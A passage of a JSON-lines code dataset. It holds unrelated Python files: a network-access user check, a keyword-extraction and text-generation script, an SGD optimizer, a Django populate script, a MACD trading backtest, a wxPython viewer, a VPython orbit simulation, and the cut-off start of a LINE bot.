需排除is_public的AP\n username_ap = dict()\n # TODO 加上时间筛选, 30天内\n sql = f\"\"\"\n SELECT username, ap_mac, count(*) AS accept_count FROM stat_user GROUP BY username, ap_mac ORDER BY accept_count DESC\n \"\"\"\n log.info(f'sql: {sql}')\n for row in DbOperation.select(sql):\n username = row['username']\n ap_mac = row['ap_mac']\n accept_count = row['accept_count']\n if ap_mac in public_ap:\n continue\n if username in owner_ap:\n # 跳过已绑定用户的AP\n continue\n if username in username_ap:\n # 绑定关系已处理\n continue\n else:\n username_ap[username] = f'{ap_mac}:{accept_count}'\n\n # 按 username 统计, 告警: 不等于该ap_owner的username\n username_ap = dict()\n sql = f\"\"\"\n SELECT username, ap_mac, count(*) AS accept_count FROM stat_user GROUP BY username, ap_mac ORDER BY accept_count DESC\n \"\"\"\n log.info(f'sql: {sql}')\n for row in DbOperation.select(sql):\n username = row['username']\n ap_mac = row['ap_mac']\n accept_count = row['accept_count']\n #\n if username in owner_ap:\n # 跳过已绑定用户的AP\n continue\n if ap_mac in public_ap:\n # 公用AP跳过\n continue\n if f'{username}' in username_ap:\n # 绑定关系已处理\n continue\n else:\n username_ap[f'{username}'] = ap_mac\n\n log.info(f'public_ap: {public_ap}')\n log.info(f'owner_ap: {owner_ap}')\n log.info(f'username_ap: {username_ap}')\n log.info(f'username_ap: {username_ap}')\n for key, value in username_ap.items():\n username = key\n ap_mac = value\n correct_ap_mac, correct_accept_count = username_ap[username].split(':')\n if ap_mac == correct_ap_mac:\n continue\n log.error(f'username: {username} 应绑定AP: {correct_ap_mac}, 次数: {correct_accept_count}. 但现连接: {ap_mac}')\n # 发送slack统计消息\n # text = f'昨天充值金额: {today_sum/100} 元, 历史累计充值金额: {total_sum/100} 元'\n # Feishu.send_groud_msg(receiver_id=Feishu.FEISHU_CHARGE_CHAT_ID, text=text)\n","sub_path":"src/timer_processor/jobs/illegal_dot1x_user.py","file_name":"illegal_dot1x_user.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"240599282","text":"import argparse\nimport pandas as pd\nimport numpy as np\n\nimport argparse\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport os\nimport pickle\n# from data_loader import get_loader\nfrom build_vocab import Vocabulary\nfrom model_fastText import EncoderCNN, DecoderRNN\nfrom torch.nn.utils.rnn import pack_padded_sequence\nfrom torchvision import transforms\nfrom collections import OrderedDict\nimport spacy, string, nltk\nfrom spacy.lang.en.stop_words import STOP_WORDS\nimport gensim\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\n\n# Device configuration\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\nnlp = spacy.load('en_core_web_sm')\nstopwords = set(stopwords.words('english'))\npunctuation = set(string.punctuation)\nlemmatize = WordNetLemmatizer()\nwords = set(nltk.corpus.words.words())\n\nclass TextRank4Keyword():\n \"\"\"Extract keywords from text\"\"\"\n\n def __init__(self):\n self.d = 0.85 # damping coefficient, usually is .85\n self.min_diff = 1e-5 # convergence threshold\n self.steps = 10 # iteration steps\n self.node_weight = None # save keywords and its weight\n\n\n def set_stopwords(self, stopwords):\n \"\"\"Set stop words\"\"\"\n for word in STOP_WORDS.union(set(stopwords)):\n lexeme = nlp.vocab[word]\n lexeme.is_stop = True\n\n def sentence_segment(self, doc, candidate_pos, lower):\n \"\"\"Store those words only in cadidate_pos\"\"\"\n sentences = []\n for sent in doc.sents:\n selected_words = []\n for token in 
sent:\n # Store words only with cadidate POS tag\n if token.pos_ in candidate_pos and token.is_stop is False:\n if lower is True:\n selected_words.append(token.text.lower())\n else:\n selected_words.append(token.text)\n sentences.append(selected_words)\n return sentences\n\n def get_vocab(self, sentences):\n \"\"\"Get all tokens\"\"\"\n vocab = OrderedDict()\n i = 0\n for sentence in sentences:\n for word in sentence:\n if word not in vocab:\n vocab[word] = i\n i += 1\n return vocab\n\n def get_token_pairs(self, window_size, sentences):\n \"\"\"Build token_pairs from windows in sentences\"\"\"\n token_pairs = list()\n for sentence in sentences:\n for i, word in enumerate(sentence):\n for j in range(i+1, i+window_size):\n if j >= len(sentence):\n break\n pair = (word, sentence[j])\n if pair not in token_pairs:\n token_pairs.append(pair)\n return token_pairs\n\n def symmetrize(self, a):\n return a + a.T - np.diag(a.diagonal())\n\n def get_matrix(self, vocab, token_pairs):\n \"\"\"Get normalized matrix\"\"\"\n # Build matrix\n vocab_size = len(vocab)\n g = np.zeros((vocab_size, vocab_size), dtype='float')\n for word1, word2 in token_pairs:\n i, j = vocab[word1], vocab[word2]\n g[i][j] = 1\n\n # Get Symmeric matrix\n g = self.symmetrize(g)\n\n # Normalize matrix by column\n norm = np.sum(g, axis=0)\n g_norm = np.divide(g, norm, where=norm!=0) # this is ignore the 0 element in norm\n\n return g_norm\n\n\n def get_keywords(self, number=10):\n \"\"\"Print top number keywords\"\"\"\n keywords = []\n node_weight = OrderedDict(sorted(self.node_weight.items(), key=lambda t: t[1], reverse=True))\n for i, (key, value) in enumerate(node_weight.items()):\n keywords.append(key)\n # print(key + ' - ' + str(value))\n if i > number:\n break\n return keywords\n\n def analyze(self, text,\n candidate_pos=['NOUN', 'PROPN'],\n window_size=4, lower=False, stopwords=list()):\n \"\"\"Main function to analyze text\"\"\"\n\n # Set stop words\n self.set_stopwords(stopwords)\n\n # Pare text by spaCy\n doc = nlp(text)\n\n # Filter sentences\n sentences = self.sentence_segment(doc, candidate_pos, lower) # list of list of words\n\n # Build vocabulary\n vocab = self.get_vocab(sentences)\n\n # Get token_pairs from windows\n token_pairs = self.get_token_pairs(window_size, sentences)\n\n # Get normalized matrix\n g = self.get_matrix(vocab, token_pairs)\n\n # Initionlization for weight(pagerank value)\n pr = np.array([1] * len(vocab))\n\n # Iteration\n previous_pr = 0\n for epoch in range(self.steps):\n pr = (1-self.d) + self.d * np.dot(g, pr)\n if abs(previous_pr - sum(pr)) < self.min_diff:\n break\n else:\n previous_pr = sum(pr)\n\n # Get weight for each node\n node_weight = dict()\n for word, index in vocab.items():\n node_weight[word] = pr[index]\n\n self.node_weight = node_weight\n\n\ndef unique_keywords(df):\n all_keywords = []\n values = []\n for item in df:\n # gensim.utils.simple_preprocess(item, deacc=True)\n doc = nlp(item)\n b = []\n for tok in doc:\n\t if tok.is_stop != True and tok.pos_ != 'SYM' and \\\n \t tok.tag_ != 'PRP' and tok.tag_ != 'PRP$' and \\\n tok.tag_ != '_SP' and tok.pos_ != 'NUM' and \\\n tok.dep_ != 'aux' and tok.dep_ != 'prep' and \\\n tok.dep_ != 'det' and tok.dep_ != 'cc' and \\\n tok.lemma_ != 'frac' and len(tok) != 1 and \\\n tok.lemma_.lower() in words and \\\n tok.lemma_.lower() not in stopwords and \\\n tok.lemma_.lower() not in punctuation:\n b.append(lemmatize.lemmatize(tok.lemma_.lower()))\n\n # print(b)\n # print(\" \".join(b))\n tr4w = TextRank4Keyword()\n tr4w.analyze(\" \".join(b), 
candidate_pos = ['NOUN', 'PROPN'], window_size=4, lower=False)\n keyword = tr4w.get_keywords(5)\n all_keywords.append(keyword)\n values = values + keyword\n return all_keywords, values\n\ndef genereate(args,key_words):\n # Create model directory\n if not os.path.exists(args.model_path):\n os.makedirs(args.model_path)\n\n # Load vocabulary wrapper\n with open(args.emb_model, 'rb') as f:\n emb_model = pickle.load(f)\n\n emb_model_weights = emb_model.wv.syn0\n\n # Build data loader\n # data_loader = get_loader(args.image_dir, args.caption_path, vocab,\n # args.dictionary, args.batch_size,\n # shuffle=True, num_workers=args.num_workers)\n # data = input(\"Enter Topic: \")\n # Build the models\n #encoder = EncoderCNN(args.embed_size).to(device)\n # dictionary = pd.read_csv(args.dictionary, header=0,encoding = 'unicode_escape',error_bad_lines=False)\n # dictionary = list(dictionary['keys'])\n\n decoder = DecoderRNN(args.embed_size, args.hidden_size, len(emb_model.wv.vocab), args.num_layers, emb_model_weights).to(device)\n decoder.load_state_dict(torch.load(args.model_path, map_location=device))\n decoder.eval()\n\n\n # Train the models\n # total_step = len(data_loader)\n # for epoch in range(args.num_epochs):\n # for i, (array, captions, lengths) in enumerate(data_loader):\n array = torch.zeros((256))\n count = 0\n for val in key_words:\n array = torch.add(array, torch.from_numpy(emb_model.wv[val]))\n count += 1\n array = torch.div(array, count)\n # print(\"In sample\", array)\n array = (array, )\n array = torch.stack(array, 0)\n array = array.to(device)\n # print(\"After\", array)\n #captions = captions.to(device)\n # targets = pack_padded_sequence(captions, lengths, batch_first=True)[0]\n\n # Forward, backward and optimize\n #features = encoder(images)\n outputs = decoder.sample(array)\n\n count = 0\n sentence = ''\n for i in range(len(outputs)):\n sampled_ids = outputs[i].cpu().numpy() # (1, max_seq_length) -> (max_seq_length)\n\n # Convert word_ids to words\n sampled_caption = []\n for word_id in sampled_ids:\n count += 1\n word = emb_model.wv.index2word[word_id]\n sampled_caption.append(word)\n if word == '':\n break\n sentence = sentence.join(' ')\n sentence = sentence.join(sampled_caption)\n\n # Print out the image and the generated caption\n print (sentence)\n return sentence\n # print(count)\n\ndef Distance(x1,y1,x2,y2):\n\treturn ((x1-x2)**2 + (y1-y2)**2 ) ** 0.5\n\n\ndef generateKeywords(camp,resource_map,X,Y):\n\tcamp[\"distance\"] = 0\n\n\tfor idx,row in cmap.iterrows():\n\t\tcmap.loc[idx,\"distance\"] = Distance(row[\"X\"],row[\"Y\"],X,Y)\n\n\tcmap.sort_values(by=['distance'],inplace = True)\n\tresource_ids = cmap.resource_id.values[0:6]\n\tdes = []\n\tfor i in resource_ids:\n\t\tif(len(resource_map[resource_map.resource_id == i].Summarization.values)!=0):\n\t\t\tdes.append(resource_map[resource_map.resource_id == i].Summarization.values[0])\n\n\tall_keywords, values = unique_keywords(des)\n\tkeys = list(pd.unique(values))\n\tprint(keys)\n\treturn keys\n\n\nif __name__ == '__main__':\n\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--computency_map\", type=str, required=True, help=\"Path to the computency map\")\n\tparser.add_argument(\"--resource\", type=str, required=True, help=\"Path to the resource csv\")\n\n\tparser.add_argument(\"--input_X\", type=float, required=True, help=\"X_Cooridnate\")\n\tparser.add_argument(\"--input_Y\", type=float, required=True, help=\"Y_Cooridnate\")\n\tparser.add_argument('--model_path', type=str, 
default='collections_all_science_out/allcontent_required_NotNull_sum_outFastText.ckpt' , help='path of saved models')\n# \tparser.add_argument('--vocab_path', type=str, default='allcontent_required_NotNull_sum_outCaptions.pkl', help='path for vocabulary wrapper')\n# \tparser.add_argument('--dictionary', type=str, default='allcontent_required_NotNull_sum_out.dict', help='path to dictionary file')\n # parser.add_argument('--caption_path', type=str, default='data/testdata.csv', help='path for train annotation json file')\n\tparser.add_argument('--log_step', type=int , default=10, help='step size for prining log info')\n\tparser.add_argument('--image_dir', type=str, default='png/' , help='tmp')\n\tparser.add_argument('--emb_model', type=str, default='collections_all_science_out/fasttext.model', help='path for embedding model')\n\n # Model parameters\n\tparser.add_argument('--embed_size', type=int , default=256, help='dimension of word embedding vectors')\n\tparser.add_argument('--hidden_size', type=int , default=512, help='dimension of lstm hidden states')\n\tparser.add_argument('--num_layers', type=int , default=2, help='number of layers in lstm')\n\n\tparser.add_argument('--num_epochs', type=int, default=5)\n\tparser.add_argument('--batch_size', type=int, default=128)\n\tparser.add_argument('--num_workers', type=int, default=2)\n\tparser.add_argument('--learning_rate', type=float, default=0.001)\n\n\n\targs = parser.parse_args()\n\n\tcmap = pd.read_csv(args.computency_map)\n\tresource_map = pd.read_csv(args.resource)\n\n\tcmap.sort_values(by = ['topic_volume', 'doc_volume'],inplace = True)\n\n\tnear_topics = generateKeywords(cmap,resource_map,args.input_X,args.input_Y)\n\n\tsen = genereate(args,near_topics)\n","sub_path":"gen_new_sumFastText.py","file_name":"gen_new_sumFastText.py","file_ext":"py","file_size_in_byte":11458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"136311786","text":"import numpy as np\nfrom copy import deepcopy\n\nclass SGD:\n\n\tdef __init__(self, lr, momentum):\n\t\tself.lr = lr\n\t\tself.momentum = momentum\n\t\tself.prev_deltas = None\n\n\tdef step(self, layers):\n\t\tif not self.prev_deltas:\n\t\t\tself.prev_deltas = [np.zeros_like(layer.weights) for layer in layers]\n\n\t\tfor layer, prev_deltas in zip(layers, self.prev_deltas):\n\t\t\tfor j, in_node in enumerate(layer.in_nodes):\n\t\t\t\tfor k, out_node in enumerate(layer.out_nodes):\n\t\t\t\t\tdelta = self.lr*in_node*out_node\n\t\t\t\t\tlayer.weights[k, j] += delta + self.momentum*prev_deltas[k, j]\n","sub_path":"optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"160897198","text":"import os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE','first_project.settings')\n\nimport django\ndjango.setup()\n\n\nimport random\nfrom first_app.models import Topic,AccessRecord,Webpage\nfrom faker import Faker\n\nfakegen = Faker()\ntopic = ['Movies','Games','Electronics & Media','Cartoons','Footwear']\n\ndef add_topic():\n t = Topic.objects.get_or_create(top_name=random.choice(topic))[0]\n t.save()\n return t\n\n\ndef populate(N=5):\n\n for entry in range(N):\n\n top = add_topic()\n\n\n fake_name = fakegen.company()\n fake_url = fakegen.url()\n fake_date = fakegen.date()\n\n\n webpg = Webpage.objects.get_or_create(topic=top,name=fake_name,url=fake_url)[0]\n\n acc_rec = 
AccessRecord.objects.get_or_create(name=webpg,date=fake_date)[0]\n\n\nif __name__ == '__main__':\n print(\"populating script\")\n populate(10)\n print(\"populating complete/done\")\n","sub_path":"Django Level Two/first_project/populate_first_app.py","file_name":"populate_first_app.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"91746180","text":"import pandas as pd\r\nfrom matplotlib.pyplot import *\r\nimport numpy as np\r\n\r\nN = 1000\r\nname = \"korona.csv\"\r\n\r\n\r\nclass trade:\r\n __name = \"\"\r\n __money = 0\r\n\r\n def __init__(self, name, money):\r\n self.__name = name\r\n self.__money = money\r\n self.trading()\r\n\r\n def trading(self):\r\n bought = 0\r\n\r\n transactions = 0\r\n starting_money = self.__money\r\n macd = Macd(self.__name)\r\n exchange = data(self.__name)\r\n exchange, days = exchange.getData()\r\n signal = macd.getBuySell()\r\n print(exchange)\r\n print(signal)\r\n for i in range(1, len(signal)):\r\n if signal[i] == int(1) and bought == 0:\r\n bought = (self.__money) / exchange[i] # count how many actions are bought\r\n self.__money = self.__money - (self.__money)\r\n transactions = transactions + 1\r\n print(\"bought for: \" + str(exchange[i]))\r\n elif signal[i] == int(-1) and bought > 0:\r\n self.__money = self.__money + (bought * exchange[i]) # sell previously bought actions\r\n transactions = transactions + 1\r\n print(\"sold for: \" + str(exchange[i]))\r\n bought = 0\r\n\r\n print(\"To sold: \" + str(bought) + \" now for: \" + str(exchange[len(signal)]) + \" equals: \" + str(\r\n bought * exchange[len(signal)]))\r\n print(\"After trading for 1000 days and completing \" + str(transactions) + \" transactions from: \" + str(\r\n starting_money) + \" PLN, we have: \" + str(self.__money) + \" PLN.\")\r\n\r\n\r\nclass data:\r\n __name = \"\"\r\n\r\n def __init__(self, name):\r\n self.__name = name\r\n\r\n def getData(self):\r\n data = pd.read_csv(self.__name) # load csv file\r\n close_data = []\r\n days_reversed = []\r\n for i in range(0, N):\r\n close_data.append(float(data.iloc[i, 2])) # 2 miałem\r\n days_reversed.append(data.iloc[i, 1])\r\n\r\n days = []\r\n data_reversed = []\r\n for i in reversed(close_data):\r\n data_reversed.append(i)\r\n for i in reversed(days_reversed):\r\n days.append(i)\r\n return data_reversed, days\r\n\r\n\r\nclass Macd:\r\n __macd = []\r\n __signal = []\r\n __date = []\r\n __buy_and__sell_signals = []\r\n\r\n def __init__(self, name):\r\n numbers = data(name)\r\n numbers, days = numbers.getData()\r\n self.macd(numbers)\r\n self.signal()\r\n self.buySell()\r\n self.__date = days\r\n\r\n def eman(self, n, data, day):\r\n alpha = float(2 / (n + 1))\r\n p_reversed = data[day - n: day:]\r\n p_base = []\r\n\r\n for i in reversed(p_reversed):\r\n p_base.append(i)\r\n\r\n counter = float(0.0)\r\n denominator = float(0.0)\r\n\r\n for i in range(n):\r\n number = pow(float((1 - alpha)), i)\r\n counter += p_base[i] * number\r\n denominator += number\r\n\r\n return counter / denominator\r\n\r\n def signal(self):\r\n self.__signal = []\r\n\r\n for i in range(1, len(self.__macd)):\r\n if i < 9:\r\n ema9 = self.eman(i, self.__macd, i)\r\n self.__signal.append(0)\r\n else:\r\n ema9 = self.eman(9, self.__macd, i)\r\n self.__signal.append(ema9)\r\n\r\n def macd(self, exchange):\r\n self.__macd = []\r\n for i in range(1, len(exchange)):\r\n if i <= 12:\r\n ema12 = self.eman(i, exchange, i)\r\n ema26 = self.eman(i, exchange, i)\r\n 
self.__macd.append(ema12 - ema26)\r\n            elif i < 26:\r\n                ema12 = self.eman(12, exchange, i)\r\n                ema26 = self.eman(i, exchange, i)\r\n                self.__macd.append(ema12 - ema26)\r\n            else:\r\n                ema12 = self.eman(12, exchange, i)\r\n                ema26 = self.eman(26, exchange, i)\r\n                self.__macd.append(ema12 - ema26)\r\n\r\n    def buySell(self):\r\n        self.__buy_and__sell_signals.clear()\r\n        self.__buy_and__sell_signals.append(int(0))\r\n        minus = 0\r\n        plus = 0\r\n        for var in range(1, len(self.__macd) - 1):\r\n            if self.__macd[var - 1] > self.__signal[var - 1] and self.__macd[var] <= self.__signal[var] and self.__macd[var] > 0:\r\n                minus = minus + 1\r\n                self.__buy_and__sell_signals.append(int(-1))\r\n            elif self.__macd[var - 1] < self.__signal[var - 1] and self.__macd[var] >= self.__signal[var] and self.__macd[var] < 0:\r\n                plus = plus + 1\r\n                self.__buy_and__sell_signals.append(int(1))\r\n            else:\r\n                self.__buy_and__sell_signals.append(int(0))\r\n        print(plus)\r\n        print(minus)\r\n\r\n    def getMacd(self):\r\n        return self.__macd\r\n\r\n    def getSignal(self):\r\n        return self.__signal\r\n\r\n    def getDate(self):\r\n        return self.__date\r\n\r\n    def getBuySell(self):\r\n        return self.__buy_and__sell_signals\r\n\r\n\r\nclass Plot:\r\n    def __init__(self, name):\r\n        self.create_macd_plot(name)\r\n        self.create_data_plot(name)\r\n        self.create_macd_and_data_plot(name)\r\n\r\n    def create_macd_plot(self, name):\r\n        numbers = Macd(name)\r\n        titleName = ''\r\n        for i in name:\r\n            if i == '.':\r\n                break\r\n            else:\r\n                titleName += i\r\n\r\n        titleName += \" MACD Pointer\"\r\n        p1, = plot(numbers.getMacd(), label=\"macd\")  # macd blue\r\n        p2, = plot(numbers.getSignal(), label=\"signal\")\r\n        l1 = legend([p1], [\"macd\"], loc=1)\r\n        l2 = legend([p2], [\"signal\"], loc=2)\r\n        grid(True)\r\n        days = numbers.getDate()\r\n        xlabel('Days, from: ' + days[0] + ' to ' + days[N - 1])\r\n        ylabel('Values')\r\n        xticks(np.arange(0, N + 1, step=N / 5), (\r\n            days[0], days[int(N / 5)], days[int(2 * N / 5)], days[int(3 * N / 5)], days[int(4 * N / 5)],\r\n            days[int(N - 1)]))\r\n        title(titleName)\r\n        gca().add_artist(l1)\r\n        show()\r\n\r\n    def create_data_plot(self, name):\r\n        numbers = data(name)\r\n        titleName = \"\"\r\n        for i in name:\r\n            if i == '.':\r\n                break\r\n            else:\r\n                titleName += i\r\n        titleName += \" exchange\"\r\n        numbers, days = numbers.getData()\r\n        plot(numbers)\r\n        grid(True)\r\n        xlabel('Days, from: ' + days[0] + ' to ' + days[N - 1])\r\n        ylabel('Cost in PLN')\r\n        xticks(np.arange(0, N + 1, step=N / 5), (\r\n            days[0], days[int(N / 5)], days[int(2 * N / 5)], days[int(3 * N / 5)], days[int(4 * N / 5)],\r\n            days[int(N - 1)]))\r\n        title(titleName)\r\n        show()\r\n\r\n    def create_macd_and_data_plot(self, name):\r\n        numbers = Macd(name)\r\n        inputData = data(name)\r\n        inputData, days = inputData.getData()\r\n        titleName = ''\r\n        for i in name:\r\n            if i == '.':\r\n                break\r\n            else:\r\n                titleName += i\r\n\r\n        p1, = plot(numbers.getMacd(), label=\"macd\")  # macd blue\r\n        p2, = plot(inputData, label=\"input data\")\r\n        l1 = legend([p1], [\"macd\"], loc=1)\r\n        l2 = legend([p2], [\"input data\"], loc=2)\r\n        grid(True)\r\n        xlabel('Days, from: ' + days[0] + ' to ' + days[N - 1])\r\n        ylabel('Values')\r\n        xticks(np.arange(0, N + 1, step=N / 5), (\r\n            days[0], days[int(N / 5)], days[int(2 * N / 5)], days[int(3 * N / 5)], days[int(4 * N / 5)],\r\n            days[int(N - 1)]))\r\n        title(titleName)\r\n        gca().add_artist(l1)\r\n        show()\r\n\r\n\r\ndef main():\r\n    # b = Plot(name)\r\n    c = trade(name, 
1000)\r\n\r\n\r\nmain()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"269283610","text":"import wx\r\n\r\nfrom Kernel import Module\r\nfrom icons import icons8_comments_50\r\n\r\n_ = wx.GetTranslation\r\n\r\n\r\nclass BufferView(wx.Frame, Module):\r\n    def __init__(self, parent, *args, **kwds):\r\n        # begin wxGlade: BufferView.__init__\r\n        wx.Frame.__init__(self, parent, -1, \"\",\r\n                          style=wx.DEFAULT_FRAME_STYLE | wx.FRAME_FLOAT_ON_PARENT | wx.TAB_TRAVERSAL)\r\n        Module.__init__(self)\r\n        self.SetSize((697, 584))\r\n        self.text_buffer_length = wx.TextCtrl(self, wx.ID_ANY, \"\")\r\n        self.text_buffer_info = wx.TextCtrl(self, wx.ID_ANY, \"\", style=wx.TE_CHARWRAP | wx.TE_MULTILINE)\r\n\r\n        # Menu Bar\r\n        self.BufferView_menubar = wx.MenuBar()\r\n        wxglade_tmp_menu = wx.Menu()\r\n        item = wxglade_tmp_menu.Append(wx.ID_ANY, \"Export EGV\", \"Export Engrave Data\")\r\n        self.Bind(wx.EVT_MENU, self.on_menu_export, id=item.GetId())\r\n        item = wxglade_tmp_menu.Append(wx.ID_ANY, \"Import EGV\", \"Import Engrave Data\")\r\n        self.Bind(wx.EVT_MENU, self.on_menu_import, id=item.GetId())\r\n        self.BufferView_menubar.Append(wxglade_tmp_menu, \"File\")\r\n        self.SetMenuBar(self.BufferView_menubar)\r\n        # Menu Bar end\r\n\r\n        self.__set_properties()\r\n        self.__do_layout()\r\n        # end wxGlade\r\n        self.Bind(wx.EVT_CLOSE, self.on_close, self)\r\n\r\n    def on_close(self, event):\r\n        if self.state == 5:\r\n            event.Veto()\r\n            return\r\n        else:\r\n            self.state = 5\r\n            self.device.close('window', self.name)\r\n            event.Skip()  # Call destroy as regular.\r\n\r\n    def initialize(self, channel=None):\r\n        self.device.close('window', self.name)\r\n        self.Show()\r\n\r\n        pipe = self.device.interpreter.pipe\r\n        buffer = None\r\n        if pipe is not None:\r\n            try:\r\n                buffer = pipe._buffer + pipe._queue\r\n            except AttributeError:\r\n                buffer = None\r\n        if buffer is None:\r\n            buffer = _(\"Could not find buffer.\\n\")\r\n\r\n        try:\r\n            buffer_str = buffer.decode()\r\n        except ValueError:\r\n            buffer_str = buffer.decode(\"ascii\")\r\n        except AttributeError:\r\n            buffer_str = buffer\r\n\r\n        # SetValue() returns None, so update the widgets in place rather than rebinding them\r\n        self.text_buffer_length.SetValue(str(len(buffer_str)))\r\n        self.text_buffer_info.SetValue(buffer_str)\r\n\r\n    def finalize(self, channel=None):\r\n        try:\r\n            self.Close()\r\n        except RuntimeError:\r\n            pass\r\n\r\n    def shutdown(self, channel=None):\r\n        try:\r\n            self.Close()\r\n        except RuntimeError:\r\n            pass\r\n\r\n    def __set_properties(self):\r\n        _icon = wx.NullIcon\r\n        _icon.CopyFromBitmap(icons8_comments_50.GetBitmap())\r\n        self.SetIcon(_icon)\r\n        # begin wxGlade: BufferView.__set_properties\r\n        self.SetTitle(_(\"BufferView\"))\r\n        self.text_buffer_length.SetMinSize((165, 23))\r\n        # end wxGlade\r\n\r\n    def __do_layout(self):\r\n        # begin wxGlade: BufferView.__do_layout\r\n        sizer_1 = wx.BoxSizer(wx.VERTICAL)\r\n        sizer_5 = wx.BoxSizer(wx.HORIZONTAL)\r\n        label_8 = wx.StaticText(self, wx.ID_ANY, _(\"Buffer\"))\r\n        sizer_5.Add(label_8, 0, 0, 0)\r\n        sizer_5.Add(self.text_buffer_length, 10, 0, 0)\r\n        sizer_1.Add(sizer_5, 0, wx.EXPAND, 0)\r\n        sizer_1.Add(self.text_buffer_info, 1, wx.EXPAND, 0)\r\n        self.SetSizer(sizer_1)\r\n        self.Layout()\r\n        # end wxGlade\r\n\r\n# end of class BufferView\r\n\r\n    def on_menu_export(self, event):  # wxGlade: BufferView.<event_handler>\r\n        self.device.execute(\"egv export\")\r\n\r\n    def on_menu_import(self, event):  # wxGlade: BufferView.<event_handler>\r\n        self.device.execute(\"egv 
import\")\r\n\r\n","sub_path":"BufferView.py","file_name":"BufferView.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"437086136","text":"from copy import copy\nfrom time import sleep\n\nimport numpy as np\nfrom p02_simulator import AstroObject, Simulator\n\n\nfrom vpython import *\n\n\n#################################################################################\n# Main program\n#################################################################################\n\n# set up parameters\nG = 6.67*10**(-11) # Newton's gravitational constant in m**3 kg**(-1) s**(-2)\nM = 1.99*10**30 # mass of the Sun in kg\nm = 5.97*10**24 # mass of the Earth in kg\nRmin = 147.1*10**9 # perihelion distance (initial point) in m\n\n# express everything in natural units - use years for time\nm0=5.97*10**24 # express all masses in terms of Earth's mass\nR0=149.6*10**8 # 1/10 AU (experiment with this)\nt0=24*3600*365.24\n\nG=G/(R0**3) *m0 * t0**2 # G in R0^3 m_E**(-1) years**(-2) \nM = M/m0\nm = m/m0\nRmin = Rmin/R0\n\n\n# set up the VPython scene\nscene = canvas(title='Solar System',\n width=600, height=400,\n center=vector(0,0,0), background=color.black)\n\n# For some reason, the creators thought it would be a good idea to have y be the\n# upward direction. We'll change that to the z direction.\nscene.forward = vector(1,0,0)\nscene.up = vector(0,0,1)\n\n# Define and initiate the simulated objects - remember to translate to natural units!\nsun = AstroObject(G, \n mass = 1.99*10**30/m0, \n pos=vector(0,0,0),\n velocity=vector(0,0,0), \n color=color.orange, radius=1)\n\nearth = AstroObject(G, \n mass = 5.97*10**24/m0, \n pos=vector(147.1*10**9/R0,0,0), \n velocity=vector(0,29800*t0/R0,0), \n color=color.blue, radius=0.2)\n\n# Create the list of objects and initiate the simulator.\nobjects=[sun, earth]\nsim = Simulator(objects, G, 0.001)\n\n\n# Choose the time span of the simulation (in years).\ntmax = 2\n\n\n# Create a VPython graph object for the potential energy.\nvgraph = graph(x=800, y=0,width=600,height=600,\\\n title = 'Potential Energy', \\\n xtitle = 't [yr]', ytitle = 'V [m_E R0^2 yr^-2]', \\\n foreground = color.black, background =color.white, \\\n xmax = tmax, xmin = 0)\n\n# All subsequently defined VPython curve objects are children of the\n# same graph until the next graph object is created.\nvcurves=[ ]\nfor obj in objects:\n\tvcurves.append(gcurve(color=obj.color))\n\n# Same graph for the kinetic energy...\ntgraph = graph(x=800, y=0,width=600,height=600,\\\n title = 'Kinetic Energy (radial + angular)', \\\n xtitle = 't [yr]', ytitle = 'T [m_E R0^2 yr^-2]', \\\n foreground = color.black, background =color.white, \\\n xmax = tmax, xmin = 0)\n\ntcurves=[ ]\nfor obj in objects:\n\ttcurves.append(gcurve(color=obj.color))\n\n\n# ... and the total energy.\negraph = graph(x=800, y=0,width=600,height=600,\\\n title = 'Total Energy', \\\n xtitle = 't [yr]', ytitle = 'E [m_E R0^2 yr^-2]', \\\n foreground = color.black, background =color.white, \\\n xmax = tmax, xmin = 0)\n\necurves=[ ]\nfor obj in objects:\n\tecurves.append(gcurve(color=obj.color))\n\n# We add one curve that contains the total energy of the entire system.\necurves.append(gcurve(color=vector(31,158,137)/255.))\n\n\n# Initialize step counter...\nsteps = 0\n\n# ... 
and start the simulation.\nwhile steps * sim.dt < tmax:\n\n\t# VPython animation rate.\n\trate(100)\n\t\n\t# Take a time step.\n\tsim.update_euler()\n\n\t# Update energy graphs.\n\ttotE = 0\n\tfor i, obj in enumerate(objects):\n\t\t# if obj == earth:\n\t\ttcurves[i].plot(steps*sim.dt, obj.T)\n\t\tvcurves[i].plot(steps*sim.dt, obj.V)\n\t\tecurves[i].plot(steps*sim.dt, obj.V + obj.T)\n\t\ttotE += obj.T + 0.5*obj.V\n\n\tecurves[-1].plot(steps*sim.dt, totE)\n \n\tsteps+=1\n\n\n","sub_path":"Projects/p02/p02_solar_system.py","file_name":"p02_solar_system.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"65610352","text":"# -*- coding: utf-8 -*-\nimport os\nfrom config import *\nif os.getenv(\"DEV\") is not None:\n from dotenv import load_dotenv\n \n load_dotenv(dotenv_path='./.env')\n\nimport sys\nimport json\nimport time\nfrom hospital import *\n\nfrom flask import Flask, request, abort\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import *\n\napp = Flask(__name__)\n\n# getting channel secret\n# This would be the preferred approach but it just doesn't work\n# CHANNEL_SECRET = os.getenv('LINE_CHANNEL_SECRET')\n# CHANNEL_TOKEN = 